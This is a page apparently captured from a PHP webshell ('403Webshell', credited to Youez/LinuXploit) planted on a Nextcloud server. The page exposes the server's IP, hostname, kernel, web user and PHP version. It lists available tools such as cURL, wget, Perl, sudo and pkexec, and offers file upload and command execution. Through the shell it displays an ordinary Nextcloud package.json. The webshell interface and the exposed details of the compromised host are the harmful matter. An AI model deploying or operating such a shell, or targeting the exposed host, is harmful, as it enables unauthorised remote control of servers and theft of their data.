403Webshell
Server IP : 85.214.143.32  /  Your IP : 216.73.216.142
Web Server : nginx/1.24.0
System : Linux datensicherung.webdress.site 6.8.0-139-generic #139-Ubuntu SMP PREEMPT_DYNAMIC Sat Aug 1 03:52:05 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/nextcloud/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/nextcloud/package.json
{
  "name": "nextcloud",
  "version": "1.0.0",
  "private": true,
  "description": "Nextcloud Server",
  "keywords": [
    "nextcloud"
  ],
  "repository": {
    "type": "git",
    "url": "https://github.com/nextcloud/server.git"
  },
  "license": "AGPL-3.0-or-later",
  "author": "Nextcloud GmbH and Nextcloud contributors",
  "type": "module",
  "scripts": {
    "build": "build/demi.sh build",
    "postbuild": "build/npm-post-build.sh",
    "dev": "build/demi.sh dev",
    "postinstall": "build/demi.sh ci",
    "lint": "eslint --suppressions-location build/eslint-baseline.json --no-error-on-unmatched-pattern ./tests/playwright",
    "postlint": "build/demi.sh lint",
    "lint:fix": "build/demi.sh lint:fix",
    "playwright": "playwright test --project=default --project=admin-settings",
    "playwright:install": "playwright install chromium-headless-shell",
    "playwright:setup": "playwright test --project=setup",
    "sass": "sass --style compressed --load-path core/css core/css/ $(for cssdir in $(find apps -mindepth 2 -maxdepth 2 -name \"css\"); do if ! $(git check-ignore -q $cssdir); then printf \"$cssdir \"; fi; done)",
    "sass:icons": "node build/icons.mjs",
    "sass:watch": "sass --watch --load-path core/css core/css/ $(for cssdir in $(find apps -mindepth 2 -maxdepth 2 -name \"css\"); do if ! $(git check-ignore -q $cssdir); then printf \"$cssdir \"; fi; done)",
    "stylelint": "stylelint $(for appdir in $(ls apps); do if ! $(git check-ignore -q \"apps/$appdir\"); then printf \"'apps/$appdir/**/*.{scss,vue}' \"; fi; done) 'core/**/*.{scss,vue}'",
    "stylelint:fix": "npm run stylelint -- --fix",
    "test": "vitest run",
    "test:coverage": "vitest run --coverage",
    "test:update-snapshots": "vitest run --update",
    "test:watch": "vitest watch",
    "watch": "build/demi.sh --parallel watch"
  },
  "browserslist": [
    "extends @nextcloud/browserslist-config"
  ],
  "dependencies": {
    "@mdi/js": "^7.4.47",
    "@mdi/svg": "^7.4.47",
    "@nextcloud/auth": "^2.6.0",
    "@nextcloud/axios": "^2.6.0",
    "@nextcloud/calendar-availability-vue": "^3.0.0",
    "@nextcloud/capabilities": "^1.2.1",
    "@nextcloud/dialogs": "^7.4.1",
    "@nextcloud/event-bus": "^3.3.3",
    "@nextcloud/files": "^4.0.0",
    "@nextcloud/initial-state": "^3.0.0",
    "@nextcloud/l10n": "^3.4.1",
    "@nextcloud/logger": "^3.0.3",
    "@nextcloud/password-confirmation": "^6.1.0",
    "@nextcloud/paths": "^3.1.0",
    "@nextcloud/router": "^3.1.0",
    "@nextcloud/sharing": "^0.4.0",
    "@nextcloud/vue": "^9.9.0",
    "@vueuse/core": "^14.4.0",
    "@vueuse/integrations": "^14.4.0",
    "color": "^5.0.3",
    "debounce": "^3.0.0",
    "marked": "^17.0.1",
    "p-queue": "^9.3.3",
    "pinia": "^3.0.4",
    "sortablejs": "^1.15.7",
    "vue": "^3.5.40",
    "vue-router": "^5.2.0",
    "vuex": "^4.1.0",
    "webdav": "^5.10.0"
  },
  "devDependencies": {
    "@nextcloud/browserslist-config": "^3.1.2",
    "@nextcloud/e2e-test-server": "^0.5.1",
    "@nextcloud/eslint-config": "^9.0.0-rc.9",
    "@nextcloud/stylelint-config": "^3.2.2",
    "@nextcloud/typings": "^1.10.0",
    "@nextcloud/vite-config": "^2.5.2",
    "@playwright/test": "^1.62.1",
    "@testing-library/jest-dom": "^6.9.1",
    "@testing-library/vue": "^8.1.0",
    "@types/dockerode": "^4.0.1",
    "@vitest/coverage-v8": "^4.1.10",
    "@vue/test-utils": "^2.4.10",
    "@vue/tsconfig": "^0.9.1",
    "@zip.js/zip.js": "^2.8.34",
    "axe-core": "^4.12.1",
    "concurrently": "^9.2.4",
    "eslint": "^10.8.0",
    "eslint-plugin-no-only-tests": "^3.4.0",
    "is-svg": "^6.1.0",
    "jsdom": "^29.1.1",
    "jsdom-testing-mocks": "^1.16.0",
    "msw": "^2.15.0",
    "sass": "^1.102.0",
    "stylelint": "^17.14.1",
    "vite": "^7.3.6",
    "vitest": "^4.1.4"
  },
  "engines": {
    "node": "^24.0.0",
    "npm": "^11.3.0"
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit